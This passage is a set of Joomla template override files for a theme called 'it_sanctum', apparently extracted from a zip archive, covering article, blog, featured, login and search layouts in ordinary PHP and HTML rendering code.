			<?php if ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate()) : ?>
				<span class="label label-warning"><?php echo JText::_('JEXPIRED'); ?></span>
			<?php endif; ?>
		</div>
		<?php endif; ?>
		<?php if (!$this->print) : ?>
			<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
				<?php echo JLayoutHelper::render('joomla.content.icons', array('params' => $params, 'item' => $this->item, 'print' => false)); ?>
			<?php endif; ?>
		<?php else : ?>
			<?php if ($useDefList) : ?>
				<div id="pop-print" class="btn hidden-print">
					<?php echo JHtml::_('icon.print_screen', $this->item, $params); ?>
				</div>
			<?php endif; ?>
		<?php endif; ?>

		<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>
			<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
		<?php endif; ?>
	</div>
	<?php endif; ?>
	
	<?php if (isset($images->image_fulltext) && !empty($images->image_fulltext)) : ?>
	<?php $imgfloat = (empty($images->float_fulltext)) ? $params->get('float_fulltext') : $images->float_fulltext; ?>
	<div class="pull-<?php echo htmlspecialchars($imgfloat); ?> item-image"> <img
	<?php if ($images->image_fulltext_caption):
		echo 'class="caption"' . ' title="' . htmlspecialchars($images->image_fulltext_caption) . '"';
	endif; ?>
	src="<?php echo htmlspecialchars($images->image_fulltext); ?>" alt="<?php echo htmlspecialchars($images->image_fulltext_alt); ?>" itemprop="image"/> </div>
	<?php endif; ?>

	<?php // Content is generated by content plugin event "onContentAfterTitle" ?>
	<?php if (!$params->get('show_intro')) : echo $this->item->event->afterDisplayTitle; endif; ?>
	<?php // Content is generated by content plugin event "onContentBeforeDisplay" ?>
	<?php echo $this->item->event->beforeDisplayContent; ?>

	<?php if (isset($urls) && ((!empty($urls->urls_position) && ($urls->urls_position == '0')) || ($params->get('urls_position') == '0' && empty($urls->urls_position)))
		|| (empty($urls->urls_position) && (!$params->get('urls_position')))) : ?>
	<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>
	<?php if ($params->get('access-view')):?>

	<?php
	if (!empty($this->item->pagination) && $this->item->pagination && !$this->item->paginationposition && !$this->item->paginationrelative):
		echo $this->item->pagination;
	endif;
	?>
	<?php if (isset ($this->item->toc)) :
		echo $this->item->toc;
	endif; ?>
	<div itemprop="articleBody">
		<?php echo $this->item->text; ?>
	</div>

	<?php if ($info == 1 || $info == 2) : ?>
		<?php if ($useDefList) : ?>
			<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
		<?php endif; ?>
	<?php endif; ?>

	<?php if ($params->get('show_tags', 1) && !empty($this->item->tags->itemTags)) : ?>
		<?php $this->item->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
		<?php echo $this->item->tagLayout->render($this->item->tags->itemTags); ?>
	<?php endif; ?>

	<?php
	if (!empty($this->item->pagination) && $this->item->pagination && $this->item->paginationposition && !$this->item->paginationrelative):
		echo $this->item->pagination;
	?>
	<?php endif; ?>
	<?php if (isset($urls) && ((!empty($urls->urls_position) && ($urls->urls_position == '1')) || ($params->get('urls_position') == '1'))) : ?>
	<?php echo $this->loadTemplate('links'); ?>
	<?php endif; ?>
	<?php // Optional teaser intro text for guests ?>
	<?php elseif ($params->get('show_noauth') == true && $user->get('guest')) : ?>
	<?php echo $this->item->introtext; ?>
	<?php // Optional link to let them register to see the whole article. ?>
	<?php if ($params->get('show_readmore') && $this->item->fulltext != null) : ?>
	<?php $menu = JFactory::getApplication()->getMenu(); ?>
	<?php $active = $menu->getActive(); ?>
	<?php $itemId = $active->id; ?>
	<?php $link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false)); ?>
	<?php $link->setVar('return', base64_encode(JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language), false))); ?>
	<p class="readmore">
		<a href="<?php echo $link; ?>" class="register">
		<?php $attribs = json_decode($this->item->attribs); ?>
		<?php
		if ($attribs->alternative_readmore == null) :
			echo JText::_('COM_CONTENT_REGISTER_TO_READ_MORE');
		elseif ($readmore = $this->item->alternative_readmore) :
			echo $readmore;
			if ($params->get('show_readmore_title', 0) != 0) :
				echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
			endif;
		elseif ($params->get('show_readmore_title', 0) == 0) :
			echo JText::sprintf('COM_CONTENT_READ_MORE_TITLE');
		else :
			echo JText::_('COM_CONTENT_READ_MORE');
			echo JHtml::_('string.truncate', ($this->item->title), $params->get('readmore_limit'));
		endif; ?>
		</a>
	</p>
	<?php endif; ?>
	<?php endif; ?>
	<?php
	if (!empty($this->item->pagination) && $this->item->pagination && $this->item->paginationposition && $this->item->paginationrelative) :
		echo $this->item->pagination;
	?>
	<?php endif; ?>
	<?php // Content is generated by content plugin event "onContentAfterDisplay" ?>
	<?php echo $this->item->event->afterDisplayContent; ?>
</article>
PK!?�440it_sanctum/html/com_content/featured/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');

// If the page class is defined, add to class as suffix.
// It will be a separate class if the user starts it with a space
?>
<div class="blog-featured<?php echo $this->pageclass_sfx;?>" itemscope itemtype="http://schema.org/Blog">
<?php if ($this->params->get('show_page_heading') != 0) : ?>
<div class="page-header">
	<h1>
	<?php echo $this->escape($this->params->get('page_heading')); ?>
	</h1>
</div>
<?php endif; ?>

<?php $leadingcount = 0; ?>
<?php if (!empty($this->lead_items)) : ?>
<div class="items-leading clearfix">
	<?php foreach ($this->lead_items as &$item) : ?>
		<article class="item leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?> clearfix" 
			itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
			<?php
				$this->item = &$item;
				echo $this->loadTemplate('item');
			?>
		</article>
		<?php
			$leadingcount++;
		?>
	<?php endforeach; ?>
</div>
<?php endif; ?>
<?php
	$introcount = (count($this->intro_items));
	$counter = 0;
?>
<?php if (!empty($this->intro_items)) : ?>
	<?php foreach ($this->intro_items as $key => &$item) : ?>

		<?php
		$key = ($key - $leadingcount) + 1;
		$rowcount = (((int) $key - 1) % (int) $this->columns) + 1;
		$row = $counter / $this->columns;

		if ($rowcount == 1) : ?>

		<div class="items-row cols-<?php echo (int) $this->columns;?> <?php echo 'row-' . $row; ?> row-fluid">
		<?php endif; ?>
			<article class="item column-<?php echo $rowcount;?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?> span<?php echo round((12 / $this->columns));?>"
				itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
			<?php
					$this->item = &$item;
					echo $this->loadTemplate('item');
			?>
			</article>
			<?php $counter++; ?>

			<?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>

		</div>
		<?php endif; ?>

	<?php endforeach; ?>
<?php endif; ?>

<?php if (!empty($this->link_items)) : ?>
	<div class="items-more">
	<?php echo $this->loadTemplate('links'); ?>
	</div>
<?php endif; ?>

<?php if ($this->params->def('show_pagination', 2) == 1  || ($this->params->get('show_pagination') == 2 && $this->pagination->pagesTotal > 1)) : ?>
	<div class="pagination">

		<?php if ($this->params->def('show_pagination_results', 1)) : ?>
			<p class="counter pull-right">
				<?php echo $this->pagination->getPagesCounter(); ?>
			</p>
		<?php  endif; ?>
				<?php echo $this->pagination->getPagesLinks(); ?>
	</div>
<?php endif; ?>

</div>
PK!^ �6��5it_sanctum/html/com_content/featured/default_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$params  = &$this->item->params;
$images  = json_decode($this->item->images);
$canEdit = $this->item->params->get('access-edit');
$info    = $this->item->params->get('info_block_position', 0);

?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate())) : ?>
	<div class="system-unpublished">
<?php endif; ?>

<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>

<div class="g-article-header">
	<?php if ($params->get('show_title')) : ?>
		<div class="page-header">
			<h2 class="item-title" itemprop="name">
			<?php if ($params->get('link_titles') && $params->get('access-view')) : ?>
				<a href="<?php echo JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language)); ?>" itemprop="url">
					<?php echo $this->escape($this->item->title); ?>
				</a>
			<?php else : ?>
				<?php echo $this->escape($this->item->title); ?>
			<?php endif; ?>
			</h2>
		</div>
	<?php endif; ?>

	<?php if ($this->item->state == 0) : ?>
		<span class="label label-warning"><?php echo JText::_('JUNPUBLISHED'); ?></span>
	<?php endif; ?>
	<?php if (strtotime($this->item->publish_up) > strtotime(JFactory::getDate())) : ?>
		<span class="label label-warning"><?php echo JText::_('JNOTPUBLISHEDYET'); ?></span>
	<?php endif; ?>
	<?php if ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate()) : ?>
		<span class="label label-warning"><?php echo JText::_('JEXPIRED'); ?></span>
	<?php endif; ?>

	<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
		<?php echo JLayoutHelper::render('joomla.content.icons', array('params' => $params, 'item' => $this->item, 'print' => false)); ?>
	<?php endif; ?>

	<?php // Todo Not that elegant would be nice to group the params ?>
	<?php $useDefList = ($params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date')
		|| $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author') ); ?>

	<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>
		<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
	<?php endif; ?>
</div>

<?php if (!$params->get('show_intro')) : ?>
	<?php echo $this->item->event->afterDisplayTitle; ?>
<?php endif; ?>
<?php echo $this->item->event->beforeDisplayContent; ?> <?php echo $this->item->introtext; ?>

<?php if ($useDefList && ($info == 1 || $info == 2)) : ?>
	<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
<?php endif; ?>

<?php if ($params->get('show_tags', 1) && !empty($this->item->tags->itemTags)) : ?>
	<?php echo JLayoutHelper::render('joomla.content.tags', $this->item->tags->itemTags); ?>
<?php endif; ?>

<?php if ($params->get('show_readmore') && $this->item->readmore) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
		$link->setVar('return', base64_encode(JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language), false)));
	endif; ?>

	<?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $this->item, 'params' => $params, 'link' => $link)); ?>

<?php endif; ?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != '0000-00-00 00:00:00' )) : ?>
	</div>
<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?>
PK!ʘ&w�
�
2it_sanctum/html/com_content/category/blog_item.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Layout
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Create a shortcut for params.
$params = $this->item->params;
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html');
$canEdit = $this->item->params->get('access-edit');
$info    = $params->get('info_block_position', 0);
?>
<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate())) : ?>
	<div class="system-unpublished">
<?php endif; ?>

<div class="g-article-header">
	<?php echo JLayoutHelper::render('joomla.content.blog_style_default_item_title', $this->item); ?>

	<?php if ($canEdit || $params->get('show_print_icon') || $params->get('show_email_icon')) : ?>
		<?php echo JLayoutHelper::render('joomla.content.icons', array('params' => $params, 'item' => $this->item, 'print' => false)); ?>
	<?php endif; ?>

	<?php // Todo Not that elegant would be nice to group the params ?>
	<?php $useDefList = ($params->get('show_modify_date') || $params->get('show_publish_date') || $params->get('show_create_date')
		|| $params->get('show_hits') || $params->get('show_category') || $params->get('show_parent_category') || $params->get('show_author') ); ?>

	<?php if ($useDefList && ($info == 0 || $info == 2)) : ?>
		<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'above')); ?>
	<?php endif; ?>
</div>

<?php echo JLayoutHelper::render('joomla.content.intro_image', $this->item); ?>

<?php if (!$params->get('show_intro')) : ?>
	<?php echo $this->item->event->afterDisplayTitle; ?>
<?php endif; ?>
<?php echo $this->item->event->beforeDisplayContent; ?> <?php echo $this->item->introtext; ?>

<?php if ($useDefList && ($info == 1 || $info == 2)) : ?>
	<?php echo JLayoutHelper::render('joomla.content.info_block.block', array('item' => $this->item, 'params' => $params, 'position' => 'below')); ?>
<?php  endif; ?>

<?php if ($params->get('show_tags') && !empty($this->item->tags->itemTags)) : ?>
	<?php echo JLayoutHelper::render('joomla.content.tags', $this->item->tags->itemTags); ?>
<?php endif; ?>

<?php if ($params->get('show_readmore') && $this->item->readmore) :
	if ($params->get('access-view')) :
		$link = JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language));
	else :
		$menu = JFactory::getApplication()->getMenu();
		$active = $menu->getActive();
		$itemId = $active->id;
		$link = new JUri(JRoute::_('index.php?option=com_users&view=login&Itemid=' . $itemId, false));
		$link->setVar('return', base64_encode(JRoute::_(ContentHelperRoute::getArticleRoute($this->item->slug, $this->item->catid, $this->item->language), false)));
	endif; ?>

	<?php echo JLayoutHelper::render('joomla.content.readmore', array('item' => $this->item, 'params' => $params, 'link' => $link)); ?>

<?php endif; ?>

<?php if ($this->item->state == 0 || strtotime($this->item->publish_up) > strtotime(JFactory::getDate())
	|| ((strtotime($this->item->publish_down) < strtotime(JFactory::getDate())) && $this->item->publish_down != JFactory::getDbo()->getNullDate())) : ?>
</div>
<?php endif; ?>

<?php echo $this->item->event->afterDisplayContent; ?>
PK!��L��-it_sanctum/html/com_content/category/blog.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_content
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');

JHtml::_('behavior.caption');
?>
<div class="blog<?php echo $this->pageclass_sfx; ?>" itemscope itemtype="http://schema.org/Blog">
	<?php if ($this->params->get('show_page_heading')) : ?>
		<div class="page-header">
			<h1> <?php echo $this->escape($this->params->get('page_heading')); ?> </h1>
		</div>
	<?php endif; ?>

	<?php if ($this->params->get('show_category_title', 1) or $this->params->get('page_subheading')) : ?>
		<h2> <?php echo $this->escape($this->params->get('page_subheading')); ?>
			<?php if ($this->params->get('show_category_title')) : ?>
				<span class="subheading-category"><?php echo $this->category->title; ?></span>
			<?php endif; ?>
		</h2>
	<?php endif; ?>

	<?php if ($this->params->get('show_cat_tags', 1) && !empty($this->category->tags->itemTags)) : ?>
		<?php $this->category->tagLayout = new JLayoutFile('joomla.content.tags'); ?>
		<?php echo $this->category->tagLayout->render($this->category->tags->itemTags); ?>
	<?php endif; ?>

	<?php if ($this->params->get('show_description', 1) || $this->params->def('show_description_image', 1)) : ?>
		<div class="category-desc clearfix">
			<?php if ($this->params->get('show_description_image') && $this->category->getParams()->get('image')) : ?>
				<img src="<?php echo $this->category->getParams()->get('image'); ?>" alt="<?php echo htmlspecialchars($this->category->getParams()->get('image_alt')); ?>"/>
			<?php endif; ?>
			<?php if ($this->params->get('show_description') && $this->category->description) : ?>
				<?php echo JHtml::_('content.prepare', $this->category->description, '', 'com_content.category'); ?>
			<?php endif; ?>
		</div>
	<?php endif; ?>

	<?php if (empty($this->lead_items) && empty($this->link_items) && empty($this->intro_items)) : ?>
		<?php if ($this->params->get('show_no_articles', 1)) : ?>
			<p><?php echo JText::_('COM_CONTENT_NO_ARTICLES'); ?></p>
		<?php endif; ?>
	<?php endif; ?>

	<?php $leadingcount = 0; ?>
	<?php if (!empty($this->lead_items)) : ?>
		<div class="items-leading clearfix">
			<?php foreach ($this->lead_items as &$item) : ?>
				<article class="item leading-<?php echo $leadingcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>"
					itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
					<?php
					$this->item = & $item;
					echo $this->loadTemplate('item');
					?>
				</article>
				<?php $leadingcount++; ?>
			<?php endforeach; ?>
		</div><!-- end items-leading -->
	<?php endif; ?>

	<?php
	$introcount = (count($this->intro_items));
	$counter = 0;
	?>

	<?php if (!empty($this->intro_items)) : ?>
		<?php foreach ($this->intro_items as $key => &$item) : ?>
			<?php $rowcount = ((int) $key % (int) $this->columns) + 1; ?>
			<?php if ($rowcount == 1) : ?>
				<?php $row = $counter / $this->columns; ?>
				<div class="items-row cols-<?php echo (int) $this->columns; ?> <?php echo 'row-' . $row; ?> row-fluid clearfix">
			<?php endif; ?>
			<div class="span<?php echo round((12 / $this->columns)); ?>">
				<article class="item column-<?php echo $rowcount; ?><?php echo $item->state == 0 ? ' system-unpublished' : null; ?>"
					itemprop="blogPost" itemscope itemtype="http://schema.org/BlogPosting">
					<?php
					$this->item = & $item;
					echo $this->loadTemplate('item');
					?>
				</article>
				<!-- end item -->
				<?php $counter++; ?>
			</div><!-- end span -->
			<?php if (($rowcount == $this->columns) or ($counter == $introcount)) : ?>
				</div><!-- end row -->
			<?php endif; ?>
		<?php endforeach; ?>
	<?php endif; ?>

	<?php if (!empty($this->link_items)) : ?>
		<div class="items-more">
			<?php echo $this->loadTemplate('links'); ?>
		</div>
	<?php endif; ?>

	<?php if (!empty($this->children[$this->category->id]) && $this->maxLevel != 0) : ?>
		<div class="cat-children">
			<?php if ($this->params->get('show_category_heading_title_text', 1) == 1) : ?>
				<h3> <?php echo JText::_('JGLOBAL_SUBCATEGORIES'); ?> </h3>
			<?php endif; ?>
			<?php echo $this->loadTemplate('children'); ?> </div>
	<?php endif; ?>
	<?php if (($this->params->def('show_pagination', 1) == 1 || ($this->params->get('show_pagination') == 2)) && ($this->pagination->get('pages.total') > 1)) : ?>
		<div class="pagination">
			<?php if ($this->params->def('show_pagination_results', 1)) : ?>
				<p class="counter pull-right"> <?php echo $this->pagination->getPagesCounter(); ?> </p>
			<?php endif; ?>
			<?php echo $this->pagination->getPagesLinks(); ?> </div>
	<?php endif; ?>
</div>
PK!v����%it_sanctum/html/mod_login/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_login
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

require_once JPATH_SITE . '/components/com_users/helpers/route.php';

JHtml::_('behavior.keepalive');
JHtml::_('bootstrap.tooltip');

?>
<form action="<?php echo JRoute::_(htmlspecialchars(JUri::getInstance()->toString()), true, $params->get('usesecure')); ?>" method="post" id="login-form" class="form-inline">
	<?php if ($params->get('pretext')) : ?>
		<div class="pretext">
			<p><?php echo $params->get('pretext'); ?></p>
		</div>
	<?php endif; ?>
	<div class="userdata">
		<div id="form-login-username" class="control-group">
			<div class="controls">
				<?php if (!$params->get('usetext')) : ?>
					<label for="modlgn-username" class="element-invisible"><?php echo JText::_('MOD_LOGIN_VALUE_USERNAME'); ?></label>
					<input id="modlgn-username" type="text" name="username" tabindex="0" size="18" placeholder="<?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?>" />
				<?php else: ?>
					<label for="modlgn-username"><?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?></label>
					<input id="modlgn-username" type="text" name="username" tabindex="0" size="18" placeholder="<?php echo JText::_('MOD_LOGIN_VALUE_USERNAME') ?>" />
				<?php endif; ?>
			</div>
		</div>
		<div id="form-login-password" class="control-group">
			<div class="controls">
				<?php if (!$params->get('usetext')) : ?>
					<label for="modlgn-passwd" class="element-invisible"><?php echo JText::_('JGLOBAL_PASSWORD'); ?></label>
					<input id="modlgn-passwd" type="password" name="password" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD') ?>" />
				<?php else: ?>
					<label for="modlgn-passwd"><?php echo JText::_('JGLOBAL_PASSWORD') ?></label>
					<input id="modlgn-passwd" type="password" name="password" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_PASSWORD') ?>" />
				<?php endif; ?>
			</div>
		</div>
		<?php if (count($twofactormethods) > 1): ?>
		<div id="form-login-secretkey" class="control-group">
			<div class="controls">
				<?php if (!$params->get('usetext')) : ?>
						<label for="modlgn-secretkey" class="element-invisible"><?php echo JText::_('JGLOBAL_SECRETKEY'); ?></label>
						<input id="modlgn-secretkey" autocomplete="off" type="text" name="secretkey" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY') ?>" />
						<span class="btn width-auto hasTooltip" title="<?php echo JText::_('JGLOBAL_SECRETKEY_HELP'); ?>">
							<span class="icon-help"></span>
						</span>
				<?php else: ?>
					<label for="modlgn-secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY') ?></label>
					<input id="modlgn-secretkey" autocomplete="off" type="text" name="secretkey" tabindex="0" size="18" placeholder="<?php echo JText::_('JGLOBAL_SECRETKEY') ?>" />
					<span class="btn width-auto hasTooltip" title="<?php echo JText::_('JGLOBAL_SECRETKEY_HELP'); ?>">
						<span class="icon-help"></span>
					</span>
				<?php endif; ?>

			</div>
		</div>
		<?php endif; ?>
		<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
		<div id="form-login-remember" class="control-group checkbox">
			<label for="modlgn-remember" class="control-label"><?php echo JText::_('MOD_LOGIN_REMEMBER_ME') ?></label> <input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
		</div>
		<?php endif; ?>
		<div id="form-login-submit" class="control-group">
			<div class="controls">
				<button type="submit" tabindex="0" name="Submit" class="btn btn-primary"><?php echo JText::_('JLOGIN') ?></button>
			</div>
		</div>
		<?php
			$usersConfig = JComponentHelper::getParams('com_users'); ?>
			<ul class="unstyled">
			<?php if ($usersConfig->get('allowUserRegistration')) : ?>
				<li>
					<a href="<?php echo JRoute::_('index.php?option=com_users&view=registration&Itemid=' . UsersHelperRoute::getRegistrationRoute()); ?>">
					<i class="fa fa-question-circle"></i><?php echo JText::_('MOD_LOGIN_REGISTER'); ?></a>
				</li>
			<?php endif; ?>
				<li>
					<a href="<?php echo JRoute::_('index.php?option=com_users&view=remind&Itemid=' . UsersHelperRoute::getRemindRoute()); ?>">
					<i class="fa fa-question-circle"></i><?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_USERNAME'); ?></a>
				</li>
				<li>
					<a href="<?php echo JRoute::_('index.php?option=com_users&view=reset&Itemid=' . UsersHelperRoute::getResetRoute()); ?>">
					<i class="fa fa-question-circle"></i><?php echo JText::_('MOD_LOGIN_FORGOT_YOUR_PASSWORD'); ?></a>
				</li>
			</ul>
		<input type="hidden" name="option" value="com_users" />
		<input type="hidden" name="task" value="user.login" />
		<input type="hidden" name="return" value="<?php echo $return; ?>" />
		<?php echo JHtml::_('form.token'); ?>
	</div>
	<?php if ($params->get('posttext')) : ?>
		<div class="posttext">
			<p><?php echo $params->get('posttext'); ?></p>
		</div>
	<?php endif; ?>
</form>
PK!c���66&it_sanctum/html/mod_search/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_search
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Including fallback code for the placeholder attribute in the search field.
JHtml::_('jquery.framework');
JHtml::_('script', 'system/html5fallback.js', false, true);

if ($width)
{
	$moduleclass_sfx .= ' ' . 'mod_search' . $module->id;
	$css = 'div.mod_search' . $module->id . ' input[type="search"]{ width:auto; }';
	JFactory::getDocument()->addStyleDeclaration($css);
	$width = ' size="' . $width . '"';
}
else
{
	$width = '';
}
?>
<div class="search<?php echo $moduleclass_sfx ?>">
	<form action="<?php echo JRoute::_('index.php');?>" method="post" class="form-inline">
		<?php
			$output = '<label for="mod-search-searchword" class="element-invisible">' . $label . '</label> ';
			$output .= '<input autocomplete="off" name="searchword" id="mod-search-searchword" maxlength="' . $maxlength . '"  class="inputbox search-query" type="search"' . $width;
			$output .= ' placeholder="' . $text . '" />';

			if ($button) :
				if ($imagebutton) :
					$btn_output = ' <input type="image" alt="' . $button_text . '" class="button" src="' . $img . '" onclick="this.form.searchword.focus();"/>';
				else :
					$btn_output = ' <button class="button btn btn-primary" onclick="this.form.searchword.focus();">' . $button_text . '</button>';
				endif;

				switch ($button_pos) :
					case 'top' :
						$output = $btn_output . '<br />' . $output;
						break;

					case 'bottom' :
						$output .= '<br />' . $btn_output;
						break;

					case 'right' :
						$output .= $btn_output;
						break;

					case 'left' :
					default :
						$output = $btn_output . $output;
						break;
				endswitch;

			endif;

			echo $output;
		?>
		<input type="hidden" name="task" value="search" />
		<input type="hidden" name="option" value="com_search" />
		<input type="hidden" name="Itemid" value="<?php echo $mitemid; ?>" />
	</form>
</div>
PK!�.�
�
2it_sanctum/html/com_search/search/default_form.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_search
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('bootstrap.tooltip');

$lang = JFactory::getLanguage();
$upper_limit = $lang->getUpperLimitSearchWord();
?>
<form id="searchForm" action="<?php echo JRoute::_('index.php?option=com_search');?>" method="post">

	<div class="search-form-results">
		<div class="btn-toolbar">
			<div class="btn-group pull-left">
				<input type="text" name="searchword" placeholder="<?php echo JText::_('COM_SEARCH_SEARCH_KEYWORD'); ?>" id="search-searchword" size="30" maxlength="<?php echo $upper_limit; ?>" value="<?php echo $this->escape($this->origkeyword); ?>" class="inputbox" />
			</div>
			<div class="btn-group pull-left">
				<button name="Search" onclick="this.form.submit()" class="btn hasTooltip" title="<?php echo JHtml::tooltipText('COM_SEARCH_SEARCH');?>"><span class="icon-search"></span></button>
			</div>
			<input type="hidden" name="task" value="search" />
			<div class="clearfix"></div>
		</div>

		<div class="searchintro<?php echo $this->params->get('pageclass_sfx'); ?>">
			<?php if (!empty($this->searchword)):?>
			<p><?php echo JText::plural('COM_SEARCH_SEARCH_KEYWORD_N_RESULTS', '<span class="badge badge-info">' . $this->total . '</span>');?></p>
			<?php endif;?>
		</div>
	</div>

	<?php if ($this->params->get('search_phrases', 1) || $this->params->get('search_areas', 1)) : ?>
	<div class="search-add-options">
		<?php if ($this->params->get('search_phrases', 1)) : ?>
			<fieldset class="phrases">
				<legend><?php echo JText::_('COM_SEARCH_FOR');?>
				</legend>
					<div class="phrases-box">
					<?php echo $this->lists['searchphrase']; ?>
					</div>
					<div class="ordering-box">
					<label for="ordering" class="ordering">
						<?php echo JText::_('COM_SEARCH_ORDERING');?>
					</label>
					<?php echo $this->lists['ordering'];?>
					</div>
			</fieldset>
		<?php endif; ?>

		<?php if ($this->params->get('search_areas', 1)) : ?>
			<fieldset class="only">
				<legend><?php echo JText::_('COM_SEARCH_SEARCH_ONLY');?></legend>
				<?php foreach ($this->searchareas['search'] as $val => $txt) :
					$checked = is_array($this->searchareas['active']) && in_array($val, $this->searchareas['active']) ? 'checked="checked"' : '';
				?>
				<label for="area-<?php echo $val;?>" class="checkbox">
					<input type="checkbox" name="areas[]" value="<?php echo $val;?>" id="area-<?php echo $val;?>" <?php echo $checked;?> >
					<?php echo JText::_($txt); ?>
				</label>
				<?php endforeach; ?>
			</fieldset>
		<?php endif; ?>
	</div>
	<?php endif; ?>

</form>
PK!��muu5it_sanctum/html/com_search/search/default_results.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_search
 *
 * @copyright   Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<dl class="search-results<?php echo $this->pageclass_sfx; ?>">
<?php foreach ($this->results as $result) : ?>
	<div class="result-item">
		<dt class="result-title">
			<div class="item-number"><?php echo $this->pagination->limitstart + $result->count . '. '; ?></div>
			<?php if ($result->href) : ?>
				<h4><a href="<?php echo JRoute::_($result->href); ?>"<?php if ($result->browsernav == 1) : ?> target="_blank"<?php endif; ?>>
					<?php echo $result->title; ?>
				</a></h4>
